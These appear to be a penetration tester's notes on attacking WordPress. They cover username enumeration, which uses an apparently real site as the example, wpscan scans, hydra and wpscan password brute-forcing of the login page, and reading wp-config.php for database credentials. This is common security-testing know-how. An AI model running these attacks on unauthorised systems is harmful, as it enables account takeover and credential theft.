### Find Usernames <https://www.wooda.co.uk/wp-json/wp/v2/users> wp-sitemap-users-1.xml ### basic [[wpscan]] ```bash wpscan --url http://$IP:$PORT -e vt,tt,u,ap ``` ### Bruteforce Might get you origin IP behind WAF if enabled. Use collaborator for callback. https://www.target.com/xmlrpc.php ```bash # wpscan - DO NOT ONLY RELY ON WPSCAN, USE HYDRA wpscan --url http://$IP:PORT --passwords $wordlist wpscan --url http://$IP:PORT -U $userlist --passwords $wordlist # hydra - http-post-form hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP https-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=Location' -V -e nsr -f -t 50 ``` ### Check out `/var/www/html/wordpress/wp-config.php` after get the initial access. There's often DB creds in there. ### Proxychains ```bash proxychains -q wpscan --url http://$IP:PORT -e vt,tt,u,ap ```